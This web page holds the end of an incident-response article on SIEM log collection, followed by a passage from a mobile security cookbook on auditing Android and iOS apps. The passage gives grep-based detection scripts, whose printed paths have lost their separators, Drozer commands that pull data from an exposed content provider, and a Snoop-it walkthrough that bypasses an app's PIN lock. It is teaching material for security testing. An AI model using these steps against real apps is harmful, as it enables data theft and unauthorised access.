DHCP servers often contain logs on the assignment of IP addresses mapped to the MAC address of the hosts NIC. This becomes important if an incident responder has to track down a specific workstation or laptop that was connected to the network at a specific data and time. Application Servers: A wide range of applications from Email to Web Applications is housed on network servers. Each of these can provide logs specific to the type of application. Network devices such as switches, routers and firewalls also have their own internal logs that maintain data on access and changes. Incident responders should become familiar with the types of network devices on their organization's network and also be able to access these logs in the event of an incident. Security information and Event management system A significant challenge that a great many organizations has is the nature of logging on network devices. With limited space, log files are often rolled over where the new log files are written over older log files. The result is that in some cases, an organization may only have a few days or even a few hours of important logs. If a potential incident happened several weeks ago, the incident response personnel will be without critical pieces of evidence. One tool that has been embraced by a number of enterprises is a Security Information and Event Management (SIEM) System. These appliances have the ability to aggregate log and event data from network sources and combine them into a single location. This allows the CSIRT and other security personnel to observe activity across the entire network without having to examine individual systems. The diagram below illustrates how a SIEM integrates into the overall network: A variety of sources from security controls to SQL databases are configured to send logs to the SIEM. In this case, the SQL database located at 10.100.20.18 indicates that the user account USSalesSyncAcct was utilized to copy a database to the remote host located at 10.88.6.12. The SIEM allows for quick examination of this type of activity. For example, if it is determined that the account USSalesSyncAcct had been compromised, CSIRT analysts can quickly query the SIEM for any usage of that account. From there, they would be able to see the log entry that indicated a copy of a database to the remote host. Without that SIEM, CSIRT analysts would have to search each individual system that might have been accessed, a process that may be prohibitive. From the SIEM platform, security and network analysts have the ability to perform a number of different tasks related to Incident Response: Log Aggregation: Typical enterprises have several thousand devices within the internal network, each with their own logs; the SIEM can be deployed to aggregate these logs in a central location. Log Retention: Another key feature that SIEM platforms provide is a platform to retain logs. Compliance frameworks such as the Payment Card Industry Data Security Standard (PCI-DSS) stipulate that logs should be maintained for a period of one year with 90 days immediately available. SIEM platforms can aid with log management by providing a system that archives logs in an orderly fashion and allows for the immediate retrieval. Routine Analysis: It is advisable with a SIEM platform to conduct period reviews of the information. SIEM platforms often provide a dashboard that highlights key elements such as the number of connections, data flow, and any critical alerts. SIEMs also allow for reporting so that stakeholders can keep informed of activity. Alerting: SIEM platforms have the ability to alert to specific conditions that may indicate malicious activity. This can include alerting from security controls such as anti-virus, Intrusion Prevention or Detection Systems. Another key feature of SIEM platforms is event correlation. This technique examines the log files and determines if there is a link or any commonality in the events. The SIEM then has the capability to alert on these types of events. For example, if a user account attempts multiple logins across a number of systems in the enterprise, the SIEM can identify that activity and alert to it. Incident Response: As the SIEM becomes the single point for log aggregation and analysis; CSIRT analysts will often make use of the SIEM during an incident. CSIRT analysis will often make queries on the platform as well as download logs for offline analysis. Because of the centralization of log files, the time to conduct searches and event collection is significantly reduced. For example, a CSIRT analysis has indicated a user account has been compromised. Without a SIEM, the CSIRT analyst would have to check various systems for any activity pertaining to that user account. With a SIEM in place, the analyst simply conducts a search of that user account on the SIEM platform, which has aggregated user account activity, logs from systems all over the enterprise. The result is the analyst has a clear idea of the user account activity in a fraction of the time it would have taken to examine logs from various systems throughout the enterprise. SIEM platforms do entail a good deal of time and money to purchase and implement. Adding to that cost is the constant upkeep, maintenance and modification to rules that is necessary. From an Incident Response perspective though, a properly configured and maintained SIEM is vital to gathering network-based evidence in a timely manner. In addition, the features and capability of SIEM platforms can significantly reduce the time it takes to determine a root cause of an incident once it has been detected. The following article has an excellent breakdown and use cases of SIEM platforms in enterprise environments: https://gbhackers.com/security-information-and-event-management-siem-a-detailed-explanation/. Security onion Full-featured SIEM platforms may be cost prohibitive for some organizations. One option that is available is the open source platform Security Onion. The Security Onion ties a wide range of security tools such as OSSEC, Suricata, and Snort into a single platform. Security Onion also has features such as dashboards and tools for deep analysis of log files. For example, the following screenshot shows the level of detail available: Although installing and deploying the Security Onion may require some resources in time, it is a powerful low cost alternative providing a solution to organizations that cannot deploy a full-featured SIEM solution. (The Security Onion platform and associated documentation is available at https://securityonion.net/). Summary Evidence that is pertinent to incident responders is not just located on the hard drive of a compromised host. There is a wealth of information available from network devices spread throughout the environment. With proper preparation, a CSIRT may be able to leverage the evidence provided by these devices through solutions such as a SIEM. CSIRT personnel also have the ability to capture the network traffic for later analysis through a variety of methods and tools. Behind all of these techniques though, is the legal and policy implications that CSIRT personnel and the organization at large needs to navigate. By preparing for the legal and technical challenges of network evidence collection, CSIRT members can leverage this evidence and move closer to the goal of determining the root cause of an incident and bringing the organization back up to operations. Resources for Article: Further resources on this subject: Selecting and Analyzing Digital Evidence [article] Digital and Mobile Forensics [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 31200
article-image-auditing-mobile-applications
Packt
08 Jul 2016
48 min read
Save for later

Auditing Mobile Applications

Packt
08 Jul 2016
48 min read
In this article by Prashant Verma and Akshay Dikshit, author of the book Mobile Device Exploitation Cookbook we will cover the following topics: Auditing Android apps using static analysis Auditing Android apps using a dynamic analyzer Using Drozer to find vulnerabilities in Android applications Auditing iOS application using static analysis Auditing iOS application using a dynamic analyzer Examining iOS App Data storage and Keychain security vulnerabilities Finding vulnerabilities in WAP-based mobile apps Finding client-side injection Insecure encryption in mobile apps Discovering data leakage sources Other application-based attacks in mobile devices Launching intent injection in Android (For more resources related to this topic, see here.) Mobile applications such as web applications may have vulnerabilities. These vulnerabilities in most cases are the result of bad programming practices or insecure coding techniques, or may be because of purposefully injected bad code. For users and organizations, it is important to know how vulnerable their applications are. Should they fix the vulnerabilities or keep/stop using the applications? To address this dilemma, mobile applications need to be audited with the goal of uncovering vulnerabilities. Mobile applications (Android, iOS, or other platforms) can be analyzed using static or dynamic techniques. Static analysis is conducted by employing certain text or string based searches across decompiled source code. Dynamic analysis is conducted at runtime and vulnerabilities are uncovered in simulated fashion. Dynamic analysis is difficult as compared to static analysis. In this article, we will employ both static and dynamic analysis to audit Android and iOS applications. We will also learn various other techniques to audit findings, including Drozer framework usage, WAP-based application audits, and typical mobile-specific vulnerability discovery. Auditing Android apps using static analysis Static analysis is the mostcommonly and easily applied analysis method in source code audits. Static by definition means something that is constant. Static analysis is conducted on the static code, that is, raw or decompiled source code or on the compiled (object) code, but the analysis is conducted without the runtime. In most cases, static analysis becomes code analysis via static string searches. A very common scenario is to figure out vulnerable or insecure code patterns and find the same in the entire application code. Getting ready For conducting static analysis of Android applications, we at least need one Android application and a static code scanner. Pick up any Android application of your choice and use any static analyzer tool of your choice. In this recipe, we use Insecure Bank, which is a vulnerable Android application for Android security enthusiasts. We will also use ScriptDroid, which is a static analysis script. Both Insecure Bank and ScriptDroid are coded by Android security researcher, Dinesh Shetty. How to do it... Perform the following steps: Download the latest version of the Insecure Bank application from GitHub. Decompress or unzip the .apk file and note the path of the unzipped application. Create a ScriptDroid.bat file by using the following code: @ECHO OFF SET /P Filelocation=Please Enter Location: mkdir %Filelocation%OUTPUT :: Code to check for presence of Comments grep -H -i -n -e "//" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_comment.txt" type -H -i "%Filelocation%*.java" |gawk "//*/,/*//" >> "%Filelocation%OUTPUTMultilineComments.txt" grep -H -i -n -v "TODO" "%Filelocation%OUTPUTTemp_comment.txt" >> "%Filelocation%OUTPUTSinglelineComments.txt" del %Filelocation%OUTPUTTemp_comment.txt :: Code to check for insecure usage of SharedPreferences grep -H -i -n -C2 -e "putString" "%Filelocation%*.java" >> "%Filelocation%OUTPUTverify_sharedpreferences.txt" grep -H -i -n -C2 -e "MODE_PRIVATE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTModeprivate.txt" grep -H -i -n -C2 -e "MODE_WORLD_READABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTWorldreadable.txt" grep -H -i -n -C2 -e "MODE_WORLD_WRITEABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUTWorldwritable.txt" grep -H -i -n -C2 -e "addPreferencesFromResource" "%Filelocation%*.java" >> "%Filelocation%OUTPUTverify_sharedpreferences.txt" :: Code to check for possible TapJacking attack grep -H -i -n -e filterTouchesWhenObscured="true" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTTemp_tapjacking.txt" grep -H -i -n -e "<Button" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTtapjackings.txt" grep -H -i -n -v filterTouchesWhenObscured="true" "%Filelocation%OUTPUTtapjackings.txt" >> "%Filelocation%OUTPUTTemp_tapjacking.txt" del %Filelocation%OUTPUTTemp_tapjacking.txt :: Code to check usage of external storage card for storing information grep -H -i -n -e "WRITE_EXTERNAL_STORAGE" "%Filelocation%........AndroidManifest.xml" >> "%Filelocation%OUTPUTSdcardStorage.txt" grep -H -i -n -e "getExternalStorageDirectory()" "%Filelocation%*.java" >> "%Filelocation%OUTPUTSdcardStorage.txt" grep -H -i -n -e "sdcard" "%Filelocation%*.java" >> "%Filelocation%OUTPUTSdcardStorage.txt" :: Code to check for possible scripting javscript injection grep -H -i -n -e "addJavascriptInterface()" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_probableXss.txt" grep -H -i -n -e "setJavaScriptEnabled(true)" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_probableXss.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_probableXss.txt" >> "%Filelocation%OUTPUTprobableXss.txt" del %Filelocation%OUTPUTTemp_probableXss.txt :: Code to check for presence of possible weak algorithms grep -H -i -n -e "MD5" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -e "base64" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -e "des" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_weakencryption.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_weakencryption.txt" >> "%Filelocation%OUTPUTWeakencryption.txt" del %Filelocation%OUTPUTTemp_weakencryption.txt :: Code to check for weak transportation medium grep -H -i -n -C3 "http://" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_overhttp.txt" grep -H -i -n -C3 -e "HttpURLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_overhttp.txt" grep -H -i -n -C3 -e "URLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" grep -H -i -n -C3 -e "URL" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" grep -H -i -n -e "TrustAllSSLSocket-Factory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "AllTrustSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "NonValidatingSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_OtherUrlConnection.txt" >> "%Filelocation%OUTPUTOtherUrlConnections.txt" del %Filelocation%OUTPUTTemp_OtherUrlConnection.txt grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_overhttp.txt" >> "%Filelocation%OUTPUTUnencryptedTransport.txt" del %Filelocation%OUTPUTTemp_overhttp.txt :: Code to check for Autocomplete ON grep -H -i -n -e "<Input" "%Filelocation%........reslayout*.xml" >> "%Filelocation%OUTPUTTemp_autocomp.txt" grep -H -i -n -v "textNoSuggestions" "%Filelocation%OUTPUTTemp_autocomp.txt" >> "%Filelocation%OUTPUTAutocompleteOn.txt" del %Filelocation%OUTPUTTemp_autocomp.txt :: Code to presence of possible SQL Content grep -H -i -n -e "rawQuery" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "compileStatement" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "db" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "sqlite" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "database" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "insert" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "delete" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "select" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "table" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -e "cursor" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_sqlcontent.txt" grep -H -i -n -v "import" "%Filelocation%OUTPUTTemp_sqlcontent.txt" >> "%Filelocation%OUTPUTSqlcontents.txt" del %Filelocation%OUTPUTTemp_sqlcontent.txt :: Code to check for Logging mechanism grep -H -i -n -F "Log." "%Filelocation%*.java" >> "%Filelocation%OUTPUTLogging.txt" :: Code to check for Information in Toast messages grep -H -i -n -e "Toast.makeText" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_Toast.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Toast.txt" >> "%Filelocation%OUTPUTToast_content.txt" del %Filelocation%OUTPUTTemp_Toast.txt :: Code to check for Debugging status grep -H -i -n -e "android:debuggable" "%Filelocation%*.java" >> "%Filelocation%OUTPUTDebuggingAllowed.txt" :: Code to check for presence of Device Identifiers grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.java" >> "%Filelocation%OUTPUTTemp_Identifiers.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Identifiers.txt" >> "%Filelocation%OUTPUTDevice_Identifier.txt" del %Filelocation%OUTPUTTemp_Identifiers.txt :: Code to check for presence of Location Info grep -H -i -n -e "getLastKnownLocation()|requestLocationUpdates()|getLatitude()|getLongitude() |LOCATION" "%Filelocation%*.java" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for possible Intent Injection grep -H -i -n -C3 -e "Action.getIntent(" "%Filelocation%*.java" >> "%Filelocation%OUTPUTIntentValidation.txt" How it works... Go to the command prompt and navigate to the path where ScriptDroid is placed. Run the .bat file and it prompts you to input the path of the application for which you wish toperform static analysis. In our case we provide it with the path of the Insecure Bank application, precisely the path where Java files are stored. If everything worked correctly, the screen should look like the following: The script generates a folder by the name OUTPUT in the path where the Java files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion. The combination ofScriptDroid and Insecure Bank gives a very nice view of various Android vulnerabilities; usually the same is not possible with live apps. Consider the following points, for instance: Weakencryption.txt has listed down the instances of Base64 encoding used for passwords in the Insecure Bank application Logging.txt contains the list of insecure log functions used in the application SdcardStorage.txt contains the code snippet pertaining to the definitions related to data storage in SD Cards Details like these from static analysis are eye-openers in letting us know of the vulnerabilities in our application, without even running the application. There's more... Thecurrent recipe used just ScriptDroid, but there are many other options available. You can either choose to write your own script or you may use one of the free orcommercial tools. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus. See also https://github.com/dineshshetty/Android-InsecureBankv2 Auditing iOS application using static analysis Auditing Android apps a using a dynamic analyzer Dynamic analysis isanother technique applied in source code audits. Dynamic analysis is conducted in runtime. The application is run or simulated and the flaws or vulnerabilities are discovered while the application is running. Dynamic analysis can be tricky, especially in the case of mobile platforms. As opposed to static analysis, there are certain requirements in dynamic analysis, such as the analyzer environment needs to be runtime or a simulation of the real runtime.Dynamic analysis can be employed to find vulnerabilities in Android applications which aredifficult to find via static analysis. A static analysis may let you know a password is going to be stored, but dynamic analysis reads the memory and reveals the password stored in runtime. Dynamic analysis can be helpful in tampering data in transmission during runtime that is, tampering with the amount in a transaction request being sent to the payment gateway. Some Android applications employ obfuscation to prevent attackers reading the code; Dynamic analysis changes the whole game in such cases, by revealing the hardcoded data being sent out in requests, which is otherwise not readable in static analysis. Getting ready For conducting dynamic analysis of Android applications, we at least need one Android application and a dynamic code analyzer tool. Pick up any Android application of your choice and use any dynamic analyzer tool of your choice. The dynamic analyzer tools can be classified under two categories: The tools which run from computers and connect to an Android device or emulator (to conduct dynamic analysis) The tools that can run on the Android device itself For this recipe, we choose a tool belonging to the latter category. How to do it... Perform the following steps for conducting dynamic analysis: Have an Android device with applications (to be analyzed dynamically) installed. Go to the Play Store and download Andrubis. Andrubis is a tool from iSecLabs which runs on Android devices and conducts static, dynamic, and URL analysis on the installed applications. We will use it for dynamic analysis only in this recipe. Open the Andrubis application on your Android device. It displays the applications installed on the Android device and analyzes these applications. How it works... Open the analysis of the application of your interest. Andrubis computes an overall malice score (out of 10) for the applications and gives the color icon in front of its main screen to reflect the vulnerable application. We selected anorange coloredapplication to make more sense with this recipe. This is how the application summary and score is shown in Andrubis: Let us navigate to the Dynamic Analysis tab and check the results: The results are interesting for this application. Notice that all the files going to be written by the application under dynamic analysis are listed down. In our case, one preferences.xml is located. Though the fact that the application is going to create a preferences file could have been found in static analysis as well, additionally, dynamic analysis confirmed that such a file is indeed created. It also confirms that the code snippet found in static analysis about the creation of a preferences file is not a dormant code but a file that is going to be created. Further, go ahead and read the created file and find any sensitive data present there. Who knows, luck may strike and give you a key to hidden treasure. Notice that the first screen has a hyperlink, View full report in browser. Tap on it and notice that the detailed dynamic analysis is presented for your further analysis. This also lets you understand what the tool tried and what response it got. This is shown in the following screenshot: There's more... The current recipe used a dynamic analyzer belonging to the latter category. There are many other tools available in the former category. Since this is an Android platform, many of them are open source tools. DroidBox can be tried for dynamic analysis. It looks for file operations (read/write), network data traffic, SMS, permissions, broadcast receivers, and so on, among other checks.Hooker is another tool that can intercept and modify API calls initiated from the application. This is veryuseful indynamic analysis. Try hooking and tampering with data in API calls. See also https://play.google.com/store/apps/details?id=org.iseclab.andrubis https://code.google.com/p/droidbox/ https://github.com/AndroidHooker/hooker Using Drozer to find vulnerabilities in Android applications Drozer is a mobile security audit and attack framework, maintained by MWR InfoSecurity. It is a must-have tool in the tester's armory. Drozer (Android installed application) interacts with other Android applications via IPC (Inter Process Communication). It allows fingerprinting of application package-related information, its attack surface, and attempts to exploit those. Drozer is an attack framework and advanced level exploits can be conducted from it. We use Drozer to find vulnerabilities in our applications. Getting ready Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and follow the installation instructions mentioned in the user guide. Install Drozer console agent and start a session as mentioned in the User Guide. If your installation is correct, you should get Drozer command prompt (dz>). You should also have a few vulnerable applications as well to analyze. Here we chose OWASP GoatDroid application. How to do it... Every pentest starts with fingerprinting. Let us useDrozer for the same. The Drozer User Guide is very helpful for referring to the commands. The following command can be used to obtain information about anAndroid application package: run app.package.info -a <package name> We used the same to extract the information from the GoatDroid application and found the following results: Notice that apart from the general information about the application, User Permissions are also listed by Drozer. Further, let us analyze the attack surface. Drozer's attack surface lists the exposed activities, broadcast receivers, content providers, and services. The in-genuinely exposed ones may be a critical security risk and may provide you access to privileged content. Drozer has the following command to analyze the attack surface: run app.package.attacksurface <package name> We used the same to obtain the attack surface of the Herd Financial application of GoatDroid and the results can be seen in the following screenshot. Notice that one Activity and one Content Provider are exposed. We chose to attack the content provider to obtain the data stored locally. We used the followingDrozer command to analyze the content provider of the same application: run app.provider.info -a <package name> This gave us the details of the exposed content provider, which we used in another Drozer command: run scanner.provider.finduris -a <package name> We could successfully query the content providers. Lastly, we would be interested in stealing the data stored by this content provider. This is possible via another Drozer command: run app.provider.query content://<content provider details>/ The entire sequence of events is shown in the following screenshot: How it works... ADB is used to establish a connection between Drozer Python server (present on computer) and Drozer agent (.apk file installed in emulator or Android device). Drozer console is initialized to run the various commands we saw. Drozer agent utilizes theAndroid OS feature of IPC to take over the role of the target application and run the various commands as the original application. There's more... Drozer not only allows users to obtain the attack surface and steal data via content providers or launch intent injection attacks, but it is way beyond that. It can be used to fuzz the application, cause local injection attacks by providing a way to inject payloads. Drozer can also be used to run various in-built exploits and can be utilized to attack Android applications via custom-developed exploits. Further, it can also run in Infrastructure mode, allowing remote connections and remote attacks. See also Launching intent injection in Android https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf Auditing iOS application using static analysis Static analysis in source code reviews is an easier technique, and employing static string searches makes it convenient to use.Static analysis is conducted on the raw or decompiled source code or on the compiled (object) code, but the analysis is conducted outside of runtime. Usually, static analysis figures out vulnerable or insecure code patterns. Getting ready For conducting static analysis of iOS applications, we need at least one iOS application and a static code scanner. Pick up any iOS application of your choice and use any static analyzer tool of your choice. We will use iOS-ScriptDroid, which is a static analysis script, developed by Android security researcher, Dinesh Shetty. How to do it... Keep the decompressed iOS application filed and note the path of the folder containing the .m files. Create an iOS-ScriptDroid.bat file by using the following code: ECHO Running ScriptDriod ... @ECHO OFF SET /P Filelocation=Please Enter Location: :: SET Filelocation=Location of the folder containing all the .m files eg: C:sourcecodeproject iOSxyz mkdir %Filelocation%OUTPUT :: Code to check for Sensitive Information storage in Phone memory grep -H -i -n -C2 -e "NSFile" "%Filelocation%*.m" >> "%Filelocation%OUTPUTphonememory.txt" grep -H -i -n -e "writeToFile " "%Filelocation%*.m" >> "%Filelocation%OUTPUTphonememory.txt" :: Code to check for possible Buffer overflow grep -H -i -n -e "strcat(|strcpy(|strncat(|strncpy(|sprintf(|vsprintf(|gets(" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBufferOverflow.txt" :: Code to check for usage of URL Schemes grep -H -i -n -C2 "openUrl|handleOpenURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTURLSchemes.txt" :: Code to check for possible scripting javscript injection grep -H -i -n -e "webview" "%Filelocation%*.m" >> "%Filelocation%OUTPUTprobableXss.txt" :: Code to check for presence of possible weak algorithms grep -H -i -n -e "MD5" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -e "base64" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -e "des" "%Filelocation%*.m" >> "%Filelocation%OUTPUTtweakencryption.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTtweakencryption.txt" >> "%Filelocation%OUTPUTweakencryption.txt" del %Filelocation%OUTPUTtweakencryption.txt :: Code to check for weak transportation medium grep -H -i -n -e "http://" "%Filelocation%*.m" >> "%Filelocation%OUTPUToverhttp.txt" grep -H -i -n -e "NSURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "URL" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "writeToUrl" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "NSURLConnection" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -C2 "CFStream" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -C2 "NSStreamin" "%Filelocation%*.m" >> "%Filelocation%OUTPUTOtherUrlConnection.txt" grep -H -i -n -e "setAllowsAnyHTTPSCertificate|kCFStreamSSLAllowsExpiredRoots |kCFStreamSSLAllowsExpiredCertificates" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" grep -H -i -n -e "kCFStreamSSLAllowsAnyRoot|continueWithoutCredentialForAuthenticationChallenge" "%Filelocation%*.m" >> "%Filelocation%OUTPUTBypassSSLvalidations.txt" ::to add check for "didFailWithError" :: Code to presence of possible SQL Content grep -H -i -F -e "db" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "database" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "insert" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "delete" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "select" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "table" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "cursor" "%Filelocation%*.m" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite3_prepare" "%Filelocation%OUTPUTsqlcontent.txt" >> "%Filelocation%OUTPUTsqlcontent.txt" grep -H -i -F -e "sqlite3_compile" "%Filelocation%OUTPUTsqlcontent.txt" >> "%Filelocation%OUTPUTsqlcontent.txt" :: Code to check for presence of keychain usage source code grep -H -i -n -e "kSecASttr|SFHFKkey" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for Logging mechanism grep -H -i -n -F "NSLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" grep -H -i -n -F "XLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" grep -H -i -n -F "ZNLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLogging.txt" :: Code to check for presence of password in source code grep -H -i -n -e "password|pwd" "%Filelocation%*.m" >> "%Filelocation%OUTPUTpassword.txt" :: Code to check for Debugging status grep -H -i -n -e "#ifdef DEBUG" "%Filelocation%*.m" >> "%Filelocation%OUTPUTDebuggingAllowed.txt" :: Code to check for presence of Device Identifiers ===need to work more on this grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.m" >> "%Filelocation%OUTPUTTemp_Identifiers.txt" grep -H -i -n -v "//" "%Filelocation%OUTPUTTemp_Identifiers.txt" >> "%Filelocation%OUTPUTDevice_Identifier.txt" del %Filelocation%OUTPUTTemp_Identifiers.txt :: Code to check for presence of Location Info grep -H -i -n -e "CLLocationManager|startUpdatingLocation|locationManager|didUpdateToLocation |CLLocationDegrees|CLLocation|CLLocationDistance|startMonitoringSignificantLocationChanges" "%Filelocation%*.m" >> "%Filelocation%OUTPUTLocationInfo.txt" :: Code to check for presence of Comments grep -H -i -n -e "//" "%Filelocation%*.m" >> "%Filelocation%OUTPUTTemp_comment.txt" type -H -i "%Filelocation%*.m" |gawk "//*/,/*//" >> "%Filelocation%OUTPUTMultilineComments.txt" grep -H -i -n -v "TODO" "%Filelocation%OUTPUTTemp_comment.txt" >> "%Filelocation%OUTPUTSinglelineComments.txt" del %Filelocation%OUTPUTTemp_comment.txt How it works... Go to the command prompt and navigate to the path where iOS-ScriptDroid is placed. Run the batch file and it prompts you to input the path of the application for which you wish to perform static analysis. In our case, we arbitrarily chose an application and inputted the path of the implementation (.m) files. The script generates a folder by the name OUTPUT in the path where the .m files of the application are present. The OUTPUT folder contains multiple text files, each one corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion. The iOS-ScriptDroid gives first hand info of various iOS applications vulnerabilities present in the current applications. For instance, here are a few of them which are specific to the iOS platform. BufferOverflow.txt contains the usage of harmful functions when missing buffer limits such as strcat, strcpy, and so on are found in the application. URL Schemes, if implemented in an insecure manner, may result in access related vulnerabilities. Usage of URL schemes is listed in URLSchemes.txt. These are sefuuseful vulnerabilitydetails to know iniOS applications via static analysis. There's more... The current recipe used just iOS-ScriptDroid but there are many other options available. You can either choose to write your own script or you may use one of the free or commercial tools available. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus. See also Auditing Android apps using static analysis Auditing iOS application using a dynamic analyzer Dynamic analysis is theruntime analysis of the application. The application is run or simulated to discover the flaws during runtime. Dynamic analysis can be tricky, especially in the case of mobile platforms. Dynamic analysis is helpful in tampering data in transmission during runtime, for example, tampering with the amount in a transaction request being sent to a payment gateway. In applications that use custom encryption to prevent attackers reading the data, dynamic analysis is useful in revealing the encrypted data, which can be reverse-engineered. Note that since iOS applications cannot be decompiled to the full extent, dynamic analysis becomes even more important in finding the sensitive data which could have been hardcoded. Getting ready For conducting dynamic analysis of iOS applications, we need at least one iOS application and a dynamic code analyzer tool. Pick up any iOS application of your choice and use any dynamic analyzer tool of your choice. In this recipe, let us use the open source tool Snoop-it. We will use an iOS app that locks files which can only be opened using PIN, pattern, and a secret question and answer to unlock and view the file. Let us see if we can analyze this app and find a security flaw in it using Snoop-it. Please note that Snoop-it only works on jailbroken devices. To install Snoop-it on your iDevice, visit https://code.google.com/p/snoop-it/wiki/GettingStarted?tm=6. We have downloaded Locker Lite from the App Store onto our device, for analysis. How to do it... Perform the following steps to conductdynamic analysis oniOS applications: Open the Snoop-it app by tapping on its icon. Navigate to Settings. Here you will see the URL through which the interface can be accessed from your machine: Please note the URL, for we will be using it soon. We have disabled authentication for our ease. Now, on the iDevice, tap on Applications | Select App Store Apps and select the Locker app: Press the home button, and open the Locker app. Note that on entering the wrong PIN, we do not get further access: Making sure the workstation and iDevice are on the same network, open the previously noted URL in any browser. This is how the interface will look: Click on the Objective-C Classes link under Analysis in the left-hand panel: Now, click on SM_LoginManagerController. Class information gets loaded in the panel to the right of it. Navigate down until you see -(void) unlockWasSuccessful and click on the radio button preceding it: This method has now been selected. Next, click on the Setup and invoke button on the top-right of the panel. In the window that appears, click on the Invoke Method button at the bottom: As soon as we click on thebutton, we notice that the authentication has been bypassed, and we can view ourlocked file successfully. How it works... Snoop-it loads all classes that are in the app, and indicates the ones that are currently operational with a green color. Since we want to bypass the current login screen, and load directly into the main page, we look for UIViewController. Inside UIViewController, we see SM_LoginManagerController, which could contain methods relevant to authentication. On observing the class, we see various methods such as numberLoginSucceed, patternLoginSucceed, and many others. The app calls the unlockWasSuccessful method when a PIN code is entered successfully. So, when we invoke this method from our machine and the function is called directly, the app loads the main page successfully. There's more... The current recipe used just onedynamic 